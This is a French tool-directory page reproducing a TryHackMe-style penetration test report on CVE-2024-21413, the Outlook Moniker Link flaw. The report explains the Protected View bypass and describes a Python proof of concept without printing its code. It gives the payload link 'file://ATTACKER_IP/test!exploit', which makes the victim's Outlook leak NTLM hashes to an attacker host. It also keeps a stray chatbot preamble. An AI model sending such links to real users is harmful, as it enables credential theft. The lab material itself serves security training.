Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — Le 13 février 2024, Microsoft a publié une grave vulnérabilité de sécurité dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413, et connue sous le nom de Moniker Link Vulnerability. Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook. | Kitploit
Outils/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationSécurité des EmailsLabs et Pratique
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Voir le dépôt
11il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Le 13 février 2024, Microsoft a publié une grave vulnérabilité de sécurité dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413, et connue sous le nom de Moniker Link Vulnerability. Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook.

Partager

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Le 13 février 2024, Microsoft a publié une vulnérabilité de sécurité critique dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413 et connue sous le nom de Moniker Link Vulnerability. Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook. image

Excellent 👍 Voici la traduction complète + la rédaction sous forme de rapport de Test d'Intrusion (PT), en français professionnel et clair. Comme demandé – uniquement la traduction et la rédaction. Vous ajouterez les réponses, les captures d'écran et les compléments, et si vous le souhaitez, je vous aiderai par la suite.


Rapport de Test d'Intrusion

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Résumé Exécutif (Executive Summary)

Le 13 février 2024, Microsoft a publié une vulnérabilité de sécurité critique dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413, et connue sous le nom de Moniker Link Vulnerability.

Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook à l'aide d'un lien spécial (Moniker Link), et d'amener le client Outlook de la victime à envoyer des identifiants de connexion (hash NTLM) vers un serveur contrôlé par l'attaquant – sans exécution de fichier et sans avertissement de sécurité efficace.

La vulnérabilité peut conduire à une fuite d'identifiants et il existe même une possibilité théorique d'exécution de code à distance (RCE) .


📌 Détails de la vulnérabilité

ParamètreValeur
IdentifiantCVE-2024-21413
Date de publication13 février 2024
DécouvreurHaifei Li – Check Point Research
ImpactFuite d'identifiants + RCE potentiel
GravitéCritique
Complexité d'attaqueFaible
Score CVSS9.8
Lien officielhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Versions affectées

La vulnérabilité affecte les versions suivantes :

  • Microsoft Office LTSC 2021 – à partir de la version 19.0.0
  • Microsoft 365 Apps for Enterprise – à partir de la version 16.0.1
  • Microsoft Office 2019 – à partir de la version 16.0.1
  • Microsoft Office 2016 – avant la version 16.0.5435.1001

🎓 Objectifs d'apprentissage (Learning Objectives)

  • Comprendre le fonctionnement de la vulnérabilité
  • Se familiariser avec le mécanisme Outlook Protected View
  • Exploiter la vulnérabilité pour une fuite d'identifiants
  • Mesures de détection (Detection)
  • Recommandations de prévention (Mitigation)

(Description de la vulnérabilité)

image

Microsoft Outlook permet d'afficher les e-mails au format HTML et d'analyser différents types de liens tels que http:// et https://. De plus, Outlook prend également en charge des liens spéciaux appelés Moniker Links, qui permettent de lancer des applications ou d'accéder à des ressources externes sur le système d'exploitation.

Normalement, lorsqu'un e-mail contient un lien qui lance une application externe ou accède à une ressource système (comme un lien file://), le mécanisme de sécurité Protected View d'Outlook est activé. Ce mécanisme affiche un avertissement de sécurité et bloque les actions dangereuses telles que l'exécution de code, les macros ou l'accès à des ressources réseau externes.

Cependant, une vulnérabilité a été découverte dans Outlook (CVE-2024-21413) qui permet de contourner le mécanisme Protected View par une simple manipulation d'un lien de type Moniker Link.

Ce que nous avons trouvé (Findings)

Au cours du test, il a été constaté que l'utilisation d'un lien normal du type :

file://ATTACKER_IP/test

amène Outlook à tenter d'accéder à une ressource réseau via le protocole SMB, mais cette tentative est bloquée par Protected View.

En revanche, lorsque le lien inclut le caractère spécial ! et une chaîne de texte supplémentaire, par exemple :

file://ATTACKER_IP/test!exploit

Outlook n'active pas Protected View et effectue une tentative de connexion au serveur distant.

Lors de cette tentative :

Outlook tente d'accéder à la ressource via SMB

Une demande d'authentification automatique est effectuée

Les identifiants de connexion de l'utilisateur sont envoyés à l'attaquant

Le hash Windows netNTLMv2 de la victime est capturé

Il est important de noter que le partage distant n'a pas besoin d'exister réellement, car la tentative d'authentification est effectuée dans tous les cas.

Impact

La vulnérabilité permet à un attaquant :

La fuite d'identifiants utilisateur (hash netNTLMv2)

La réalisation d'attaques hors ligne (Cracking / Pass-the-Hash)

Le déplacement latéral dans le réseau d'entreprise

De plus, étant donné que les Moniker Links utilisent le mécanisme COM (Component Object Model) de Windows, il existe une possibilité théorique d'exécution de code à distance (RCE). Cependant, à la date du test, il n'existe pas de Proof of Concept public pour une RCE réelle utilisant cette vulnérabilité.

Exploitation

Dans le cadre de l'attaque, un e-mail contenant un Moniker Link similaire à celui présenté dans la tâche précédente est envoyé à la victime. Le but de l'attaquant est de créer un e-mail avec un lien Moniker Link qui contourne le mécanisme Protected View d'Outlook, de sorte que dès que la victime clique sur le lien, son client Outlook tente de charger un fichier depuis la machine de l'attaquant. Cette action entraîne l'envoi et la capture du hash netNTLMv2 de la victime par l'attaquant.

Avant d'effectuer l'attaque, passons en revue un Proof of Concept (PoC) créé à des fins de démonstration (également disponible sur GitHub).

Auteur : CMNatic | https://github.com/cmnatic Version : 1.0 | 19/02/2024

Le code utilise le langage Python et envoie un e-mail HTML contenant un lien Moniker Link malveillant.

Description du PoC

Le PoC :

Prend une adresse e-mail d'attaquant et une adresse e-mail de victime

Nécessite un mot de passe pour l'authentification SMTP (Dans cette salle, le mot de passe pour [email protected] est : attacker)

Contient le contenu HTML de l'e-mail (html_content) avec un lien Moniker Link malveillant

Définit les champs de l'e-mail : Sujet, De, À

Envoie l'e-mail via le serveur de messagerie

Télécharger l’outil